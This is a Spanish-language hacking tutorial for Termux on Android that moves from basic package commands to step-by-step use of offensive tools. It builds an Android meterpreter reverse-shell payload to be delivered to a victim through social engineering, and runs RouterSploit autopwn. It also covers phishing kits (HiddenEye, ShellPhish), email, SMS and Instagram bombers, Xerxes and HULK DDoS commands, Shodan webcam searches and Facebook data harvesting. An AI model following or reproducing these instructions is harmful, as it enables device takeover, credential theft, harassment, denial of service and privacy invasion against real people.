CURSO DE TERMUX Ever Tovar
CURSO DE TERMUX
1
CURSO DE TERMUX Ever Tovar
Contenido
Una pequeña descripción de quien soy…………………………………………………………………………….
GUIA DE TERMUX ..................................................................................................................
Comandos Básicos: ...............................................................................................................
Instalar Python, Pyhton3 y pip3............................................................................................
Instalar cURL, php y wget .....................................................................................................
Algunas herramientas:...........................................................................................................
Mestasploit ............................................................................................................................
TOOL-X................................................................................................................................
FSociety ...............................................................................................................................
Lazymux..............................................................................................................................
RouterSploit:........................................................................................................................
IPGeolocation:.....................................................................................................................
Malicious:.............................................................................................................................
Devploit ................................................................................................................................
WepPwn3r...........................................................................................................................
Algunas herramientas usando metasploit:..........................................................................
Tmvenom……………………………………………………………………………………………………………………….
SHODAN: ..........................................................................................................................
Spammers de emails, SMS e instagram............................................................................
Email-bomber:...................................................................................................................
Spammer-Grab .................................................................................................................
Instaspam: .........................................................................................................................
Herramientas para phishing:...............................................................................................
Hidden Eye:.......................................................................................................................
ShellPhish:.........................................................................................................................
Herramienta para obtener información de tus amigos en Facebook:............................
OSIF: ..................................................................................................................................
Herramientas para ataques DDOS...................................................................................
Xerxes: ..............................................................................................................................
HULK:.................................................................................................................................
2
CURSO DE TERMUX Ever Tovar
Herramienta para sacar metadatos de imagines:............................................................
ExiF: ...................................................................................................................................
3
CURSO DE TERMUX Ever Tovar
Quien soy
Me llamo Ever Tovar soy un hack de sombrero gris con experiencia en el
tema caracterizándome por siempre llevar llevar a ustedes este mundo
con guias de mi autoría totalmente gratis usando herramientas que todo
hacker de sombrero negro usa para sus fines.
Si deseas colaborar puedes hacerle en el link que dejare de mi cuenta de
paypal de esta manera me motivarías a seguir trayendo contenido de
calidad ( si deseas apoyarme o donar aquí te dejo mi paypal link
[Link] )
Llevo esta guias gratis para usted sin hacerme responsable del mal uso
que les puedan dar cada quien es responsable de sus actos.
4
CURSO DE TERMUX Ever Tovar
Comandos Básicos:
Lo primero que debemos hacer dando yo por entendido que ya has descargado el emulador de
termux, y si en caso aun no sabes como descargarlo solo deberás ir a la play store y
descargarla como una aplicación cualquiera el paso a seguir seria darle permiso de
almacenamiento a Termux y eso lo hacemos con el siguiente comando en la terminal
Comando escribirlo sin los entre paréntesis ( termux-setup-storage )
Principalmente pasamos a actualiza la lista de paquetes disponibles. Estos comandos debemos
ejecutarlos inicialmente después de la instalación y lo ejecutamos continuamente cada cierto
periodo de tiempo esto para recibir actualizaciones
Comando ( apt update )
El siguiente comando q debemos seguir en la ejecución y la función principal de este es el de
actualiza paquetes obsoletos. Esto es para que Apt pueda conocer los paquetes más nuevos
Comando ( apt upgrade )
El siguiente comando es uno de los mas importantes ya q nos permitirá buscar entre los
paquetes disponibles.
Comando ( apt search <query> )
El siguiente comando es el mas importante de todos ya q este nos permitirá instalar el paquete
o herramienta la cual deseamos trabajar.
Comando ( apt install + el nombre del paquete )
El comando que veremos a continuación nos muestra información sobre un paquete.
Comando ( apt show +nombre del paquete )
El siguiente comando enumera todos los paquetes disponibles.
Comando ( apt list )
Este enumera todos los paquetes instalados.
Comando ( apt list --installed )
En ocaciones tenemos paquetes inútiles que ya no deseamos tener para eliminar un paquete
instalado usamos el siguiente comando.
Comando ( apt remove +el nombre del paquete )
Apt como administrador de paquetes usa un formato de paquete llamado dpkg.
Normalmente, el uso directo de dpkg no es necesario, pero los siguientes dos
comandos pueden ser útiles:
dpkg -L <package>
Lista de archivos instalados de un paquete.
dpkg --verify
5
CURSO DE TERMUX Ever Tovar
Verifique la integridad de los paquetes instalados.
Ver la página del manual apt (ejecutar apt install manpara instalar primero un
visor de páginas man) para más información.
El comando a continuación muestra lo que hay dentro de la carpeta.
Comando ( ls )
Para ir a Home usamos el siguiente comando.
Comando ( cd )
Para entrar a un archivo, carpeta, directorio usamos el siguiente comando.
Comando ( cd +el nombre del archivo)
Para salir de la terminal solo basta con escribir.
Comando ( exit )
Para anular o cancelar proceso hacemos lo siguiente.
( Boton de volumen abajo + letra de teclado C )
Instalar Python, Pyhton3 y pip3
No es obligatorio poner pkg en muchos casos solo con apt es suficiente
1. Pkg install python
2. Pkg install python3
3. Pkg install python-pip
4. Pkg install python3-pip
Instalar cURL, php y wget
En algunos casos pkg no funciona siendo ese caso solo usa apt
1. pkg install curl
2. pkg install php
3. pip3 install wget
Algunas herramientas:
Metasploit: fue diseñada para explotar las vulnerabilidades de los equipos y es sin duda el
programa más usado por los mejores hackers del mundo.
. apt upgrade
. apt install curl
. curl –LO
[Link]
[Link]
6
CURSO DE TERMUX Ever Tovar
. chmod 777 [Link]
. ./[Link]
. ls
. cd metasploit-framework
. Iniciar la consola : ./msfconsole
TOOL-X
TOOL-X es un Script para instalar fácilmente distintas herramientas:
1 apt update
2 apt install git
3 git clone [Link]
4 cd Tool-X
5 chmod +x [Link]
6 sh [Link] si no funciona ejecutar ./[Link]
7 Ejecutar desde consola Tool-X
FSociety
Un framework de prueba de penetración, tendrá todos los scripts que un hacker necesita.
1 git clone [Link]
2 cd fsociety
3 chmod +x [Link]
4 bash [Link] ó ./[Link]
5 python2 [Link]
Lazymux
Es una herramienta similar a fsociety
1 git clone [Link]
2 cd Lazymux
3 python2 [Link]
RouterSploit:
routerSploit, es un framework de seguridad open source muy similar a Metasploit con el cual
podremos auditar los dispositivos
(routers, webcam, NAS, etc) para comprobar si tienen vulnerabilidades conocidas.
El framework, posee los siguientes 5 módulos
7
CURSO DE TERMUX Ever Tovar
exploits: es el módulo que aprovechan las vulnerabilidades identificadas.
creds: este módulo es para probar credenciales en los servicios de red.
scanners: es el módulo que verifican si un objetivo es vulnerable a cualquier exploit.
payloads: es el módulo para generar cargas útiles en diversas arquitecturas.
generic: módulo que realizan ataques genéricos.
<INSTALACIÓN>
routerSploit, esta maravillosa herramienta requiere de los siguientes paquetes:
- future
- requests
- paramiko
- pysnmp
- pycrypto
1 instalamos pip en Python3.
2 apt install python3-pip
clonamos el repositorio a nuestra terminal.
3 git clone [Link]
Una vez clonado nos posicionamos en él.
4 cd routersploit
Instalamos los requisitos.
5 python3 -m pip install -r [Link]
6 python3 -m pip install -r [Link]
7 Ejecutamos RouterSploit
8 python3 [Link]
<USO>
Para el uso de RouterSploit, sólo debemos de conocer la IP del dispositivo a auditar, si no has
cambiado tus IPs, posiblemente la de tu router sea
[Link] o [Link]
Una vez lanzado RouterSploit, seleccionamos el módulo scanner con autopwn
(esto lanzara todos los exploit contra el objetivo)
9 use scanner/autopwn
Marcamos el target
8
CURSO DE TERMUX Ever Tovar
10 set target [IP-DISPOSITIVO]
Pasamos a lanzar el ataque
11 run
IPGeolocation:
Herramienta que geolocaliza a la victima mediante su direccion ip:
1 git clone [Link]
2 pip3 install -r [Link] –user
3 ./[Link] –h(para ver las opciones)
Malicious:
Malicious es una herramienta para crear apk o ejecutables infectados para Android, mac,
windows etc... es una buena herramienta.
Procedemos a actualizar la terminal con
1 apt update && apt upgrade -y
Si en caso dado no se cuenta con el git ni python los instalamos con
2 apt install git python2 -y
Una vez teniendo lo anterior continuamos a clonar el git
3 git clone [Link]
Una vez clonado la seleccionamos malicious con
4 cd Malicious
Y procedemos a dar permisos
5 chmod 777 [Link]
Listamos con
6 ls
E instalamos lo siguiente
7 pip2 install -r [Link]
8 pip2 install --upgrade pip
Pasamos a ejecutarlo con
9 python2 [Link]
Una vez echo todo aparecerá una lista de sistemas a cuales se pueden generar un apk
maliciosa,
9
CURSO DE TERMUX Ever Tovar
en este caso android
Y por ejemplo dendroid
35
Ya se nos generara el apk. Para moverlo a la memoria para poderlo compartir procedemos a
listar y luego seleccionar Android
ls
cd Android
Volvemos a listar
ls
mv [Link] /sdcard
Con esto ya lo pueden encontrar en su almacenamiento...
Devploit
Devploit es una multi herramienta que nos permitira hacer varias funciones como rastrear una
ip hasta extraer datos de pag web y dispositivos...
-git clone [Link]
-cd Devploit
-chmod +x install
- ./install
-python2 [Link]
WepPwn3r
Es la herramienta que sirve para escanear paginas web en busca de bugs y vulnerabilidades.
Para los que apenas van instalando termux colocan lo siguiente...
1 -apt update
2 -apt upgrade
3 -pkg install git
4 -pkg install python
Ahora pasamos a instalar la herramienta que nos interesa...
5 -git clone [Link]
6 -cd webpwn3r
7 -chmod +x [Link]
8 -python2 [Link]
10
CURSO DE TERMUX Ever Tovar
Herramientas usando metasploit:
Como hackear un Android desde termux o, desde linux (No estoy muy seguro que en Linux
funcione no lo eh probado)
<Requisito>
Tener Metasploit instalado en termux
Siempre recomiendo tener Es file Explorer
Procedimiento
1- apt update
2- apt upgrade
3- pkg install pip
4- pkg install git
5- pkg install python2 (Solo en caso de que no lo tengan instalado
6- pkg installl php
7- git clone [Link]
8- cd tmvenom
9- ls (listamos contenido de la carpeta)
10- chmod +x [Link]
11- sh [Link]
12- python2 [Link]
Asta este paso si hicieron todo bien siguiendo cada uno de mis pasos y tienen Mestasploit
instalado en su termux
Eso les dejar un menu con 11 opciones vamos a elegir la 1 para un payload en android
-El ataque que vamos a realizar va hacer dentro de LAN por lo cual vamos abrir otra terminal y
pondremos el comando
Comando ( ifconfig )
lo cual nos dara nuestra ip la ip la podrán encontrar hasta abajo de poner el comando donde
dice
inet add:"SU IP"
O simplemente van a la configuración de su celular, wifi, entrar a la red wifi a la que están
conectados y les aparece la ip
Luego vamos a copiar la ip mencionada y nos regresamos a la sesion 1 y la ponemos hay
-Después de ponerla nos pedirá un puerto, el script nos recomienda el 4444
Y generalmente es el que vamos a poner 4444
11
CURSO DE TERMUX Ever Tovar
Nos pedirá la ruta donde lo deseamos guardar la cual pondremos.
/sdcard/"Nombre que le quieran poner al payload ejemplo="
/sdcard/[Link]
El script procederá a generar el payload, el payload lo podemos encontrar en el
almacenamiento interno, por lo cual descargamos Es file Explorer Ahí nos va a decir si
queremos empezar a entrar el modo de escucha para eso pondremos una "y" lo cual nos
estará ejecutando Metasploit :)
Una vez inicie Metasploit pondremos los siguientes comandos
1 use multi/handler
2 set payload android/meterpreter/reverse_tcp
3 set lhost "la ip que pusieron anteriormente que sacaron con el comando ifconfig"
4 set lport 4444
5 exploit
Entrara en modo de escucha y de espera a que alguien ejecute la aplicación ustedes deben de
aplicar sus técnicas de ingeniería social para que la víctima caiga en mi caso lo are en mi propio
celular
Cuando la persona instale la app y el abra se ejecuta el payload y en la terminal de termux con
el comando "help" podremos ver todas las opciones que tenemos y con eso concluye ya
habremos hackeado un Android
SHODAN:
QUE ES SHODAN es un motor de búsqueda que es capaz de encontrar cualquier dispositivo
conectado a internet, Shodan trabaja principalmente con la deep web y es catalogado como el
buscador más aterrador del mundo puesto que encuentra dispositivos de cualquier tipo
siempre y cuando tengan conexión a internet, por ejemplo: semáforos, cámaras de seguridad,
computadoras, plantas de agua, redes eléctricas, etc.
¿CÓMO FUNCIONA SHODAN?:
Buscadores como Google indexan el contenido de la web, al menos aquellos que son de
carácter público, a través de los puertos 80 y 443 (HTTP y HTTPS), la peculiaridad de Shodan es
que rastrea todos los otros puertos existentes, permitiéndole encontrar cualquier dispositivo
que posea una IP, es decir, cualquiera que tenga conexión a internet.
<uso>
Trabaja con metasploit
La configuración:
1 Cd metasploit-framework
2 ./msfconsole
3 use auxiliary/gather/shodan_search
12
CURSO DE TERMUX Ever Tovar
4 show options
se crean una cuenta en shodan. Van a [Link] Clic para crear botón verde
Luego inicias cesión
Le damos click donde señala la flecha azul Les saldrá algo como este
- m02ZKlMk4qQTHUVooORM7Pf5Va7OI4oH copian Vamos a termux y terminamos de
configurar
Siguiente paso
5 -et SHODAN_APIKEY Y PEGAN LO QUE COPIARON
6 -et QUERY "webcamxp"
7 run
Nos saldra un listado de ip copiamos cualquier ip y lo pegamos en su navegador y nos muestra
la cámara
Spammers de emails, sms e instagram
Email-bomber:
1 git clone [Link]
2 cd Email-bomber
3 python2 [Link]
Nos pedira servidor del correo, Gmail o Yahoo
5 Nos pedirá el correo depende a lo que pusiste arriba, Colocan su correo correos temporales
son la mejor opción.
6 Colocan su contraseña para logearse (es seguro)
7 Colocan Email de la victima, el mensaje a enviar y la cantidad de correos a enviar
Spammer-Grab
1 git clone [Link]
2 cd Spammer-Grab
3 ./[Link]
4 python2 [Link] –h (h les muestra los comandos)
Ejemplo:
5 Python2 [Link] –delay 15(delay es el tiempo que se tomara en enviar los mensajes
puedes poner cualquier numero) (aca el numero de la victica con el código del pais)
6 Python2 [Link] –delay 10 1234513242
13
CURSO DE TERMUX Ever Tovar
Instaspam
Herramienta para spammear cuentas de Instagram
1 git clone [Link]
2 cd instaspam
3 chmod +x [Link]
4 bash [Link] ó ./[Link]
Herramientas para phishing:
Hidden Eye:
Scripts que contiene varias páginas clonadas para obtener credenciales:
1 apt install git python php curl openssh grep
2 pip3 install wget
3 git clone [Link]
4 cd HiddenEye
5 pip3 install -r [Link]
6 chmod 777 [Link]
7 python3 [Link]
ShellPhish:
Herramienta para hacer phishing y tambien saca direcciones ip e información extra
1 git clone [Link]
2 cd shellphish
3 bash [Link] ó ./[Link]
Herramienta para obtener información de nuestros amigos en facebook:
También existe una herramienta alterna a la de OSIF que hace exactamente lo mismo, solo
buscan en google fbi github
OSIF:
1 apt update upgrade
2 apt install git python2
3 git clone [Link]
4 cd OSIF
5 pip2 install -r [Link]
6 python2 [Link]
14
CURSO DE TERMUX Ever Tovar
7 coloca help para que les aparezca las opciones
8 Aca les pedirá loggearse con su cuenta de fb para crear un Tokken, háganlo normal no pasara
nada, si no les permite quizá sea porque en su Faceboox activaron la doble verificación,
desactívenla por un minuto para loggearse y listo luego no les volverá a pedir que se loggeen
Herramientas para ataques DDOS
Xerxes:
1 apt install git
1 apt install clang
3 git clone [Link]
4 cd xerxes
5 clang xerxes.c -o xerxes
6 ./xerxes website 80
HULK:
1 Git clone [Link]
2 Cd hulk
3 Python2 [Link] -site [Link] 2>/dev/null
Herramienta para sacar metadatos de imagines:
ExiF:
1 git clone [Link]
2 Cd Exif
3 Chmod +x [Link]
4 Sh [Link] ó bash [Link] ó ./[Link]
5 Se recomienda usar EsfileExplorer para obtener la direccion especifica de la imagen
No olvides apoyarnos en PayPal link [Link]
15